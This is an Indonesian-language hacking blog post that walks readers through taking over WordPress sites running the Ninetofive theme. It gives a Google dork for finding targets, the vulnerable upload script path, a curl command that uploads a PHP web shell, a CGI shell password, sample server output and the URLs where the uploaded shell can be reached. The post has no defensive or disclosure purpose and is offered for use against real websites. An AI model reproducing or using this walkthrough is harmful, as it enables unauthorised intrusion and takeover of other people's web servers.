WordPress Theme Ninetofive Remote Exploit

Unknown 04.55 1 comment
Assalamualaikum wr wb :D apa kabar semua ? baik baik aja kan ? kalo ane sih Alhamdulillah baik :D kali ini ane mau share WordPress Theme Ninetofive Remote Exploit :D ok langsung saja disimak bre ;)


Bahan Bahan :

- CGI Shell ( Download here )


Langkah - Langkah :

1. Pertama kita cari dulu web vuln nya di google, masukin dork berikut :
    "inurl:/wp-content/themes/ninetofive"  ( Di kembangin lagi :D )

2. Lalu pilih salah satu web, dan masukin exploit berikut ini :
    "/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"

3. Jika vuln akan muncul bacaan seperti gambar dibawah ini :
       
4. Setelah itu kita buka CGI Shell nya, tapi sebelumnya upload dulu CGI Shell nya ke web
  
5. Lalu klik CGI Shell ( liat di atas gambar )
6. Setelah di klik, masukin password nya, password nya adalah webr00t
7. Jika sudah login, klik bacaan 'Upload File'
 


8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
    curl -v -F "qqfile=@namashellkalian.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
   
     
10. Jika berhasil akan seperti gambar dibawah ini :
     
11. Set-Cookie: PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjoms_551a89b87c7d7.php; expires=Tue, 31-Mar-2015 12:49:12 

 joms_551a89b87c7d7.php < ini adalah shell kita :D, tinggal di akses deh :D 

* Kadang nama shell kita berubah jadi random, contoh : 11das871kls61kja679a5651gay.php


 Tempat akses shell :   http://localhost/wp-content/uploads/tahun/bulan/shell.php
                                 http://localhost/wp-content/themes/ninetofive/scripts/uploads/shell.php


OK sekian dan salam Ganteng :D Wassalamualaikum wr wb :D

  
Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

1 komentar:

Diberdayakan oleh Blogger.

Copyright © 2014 • Eitaro Attacker | BLOG

Blogger Templates Designed by VeeThemes.com